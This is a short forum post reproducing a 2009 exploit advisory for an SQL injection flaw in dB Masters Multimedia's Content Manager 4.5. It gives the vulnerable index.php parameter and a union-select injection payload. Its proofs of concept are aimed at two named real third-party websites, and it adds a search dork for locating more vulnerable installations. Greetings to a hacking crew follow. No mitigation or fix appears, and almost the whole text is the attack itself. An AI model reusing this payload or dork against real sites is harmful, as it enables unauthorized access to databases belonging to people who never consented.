dB Masters Multimedia's Content Manager 4.5 SQL Injection Vulnerability

by Foxi Thu Jul 23, 2009 4:19 am

Code:: =========================================================================================== [o] dB Masters Multimedia's Content Manager 4.5 SQL Injection Vulnerability Software : dB Masters Multimedia's Content Manager version 4.5 Vendor : http://www.dbmasters.net/ Author : NoGe Contact : noge[dot]code[at]gmail[dot]com Blog : http://evilc0de.blogspot.com =========================================================================================== [o] Vulnerable file index.php [o] Exploit http://localhost/[path]/index.php?n=xx&id=[SQL] [o] Proof of concept http://www.fosada.za.org/index.php?n=62&id=-57+union+select+1,version()-- http://www.colourmebeautiful.com.au/index.php?n=1&id=-1+union+select+1,version()-- [o] Dork "Powered by dB Masters Multimedia's Content Manager" =========================================================================================== [o] Greetz MainHack BrotherHood [ http://serverisdown.org/news ] Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa Angela Zhang H312Y yooogy mousekill }^-^{ kaka11 zxvf martfella skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke =========================================================================================== # milw0rm.com [2009-07-16]